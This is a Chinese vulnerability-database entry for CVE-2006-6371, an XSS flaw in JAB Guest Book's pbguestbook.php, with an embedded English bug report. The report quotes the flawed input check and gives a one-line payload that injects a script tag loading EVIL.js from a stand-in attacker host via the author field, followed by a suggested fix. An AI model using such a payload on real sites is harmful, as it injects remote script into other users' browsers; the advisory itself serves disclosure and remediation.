JAB Guest Book 'pbguestbook.php'跨站点脚本(XSS)漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192615 漏洞类型 跨站脚本
发布时间 2006-12-07 更新时间 2006-12-08
CVE编号 CVE-2006-6371 CNNVD-ID CNNVD-200612-132
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://cxsecurity.com/issue/WLB-2006120063
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-132
|漏洞详情
JABGuestBook的pbguestbook.php中存在跨站点脚本(XSS)漏洞,远程攻击者可以通过author参数注入任意Web脚本或HTML。
|漏洞EXP
Script Name: JAB Guest Book
Authors: Barnz (at) hotmail.co (dot) uk [email concealed]
Website: James Barnsley
Bug Report: NetJackal (nj[AT]hackerz[DOT]ir & nima_501[AT]yahoo[DOT]com)
Status: Patch not released
First i should apologize for my bad english.
Intro:
	JAB Guest Book is a free guest book written in PHP, it works using flat files 
to store data which means no database is needed. Features include easy installation
and customisation into your existing website. An administration panel which allows 
you to delete posts and ban users, additional administration configuration to un-ban
users and to use the bad word filter. Ability for users to post messages with topic,
email and comments including emotions (smilies). The main guest book works completely
using only one file.
Bugs Description:
	look at pbguestbook.php at line 425:
	
	 
	function invalideregtest($input)
		{
		$checkcount = 0;
		
		//$exinput = str_split($input);
		
		$countname = count($exinput);
	
		for($i=0; $i<$countname; $i++)
			{
			if(!ereg("[A-Za-z0-9]", $input[$i]) == 1)
				{
				$checkcount++;
				}
			}
	
		if($checkcount != 0)
			{
			$input = "no";
			}
		else
			{
			$input = "yes";
			}
	
		return($input);
		}
	$check1 = invalideregtest($topic);
	
	script just check $topic by invalideregtest function. so what's happen if we put some thing lile
<SCRIPT SRC=http://Hacler/EVIL.js></script> in $author? yes true answer xss happens

Solution:
	Edit the code and check other inputs by invalideregtest function or simply remove html tags by
strip_tags function (PHP built-in function)
|参考资料

来源:XF
名称:jabguestbook-pbguestbook-xss(30718)
链接:http://xforce.iss.net/xforce/xfdb/30718
来源:BUGTRAQ
名称:20061204XSSinJABGuestBook
链接:http://www.securityfocus.com/archive/1/archive/1/453482/100/0/threaded
来源:SECUNIA
名称:23216
链接:http://secunia.com/advisories/23216
来源:BID
名称:21429
链接:http://www.securityfocus.com/bid/21429
来源:SREASON
名称:1992
链接:http://securityreason.com/securityalert/1992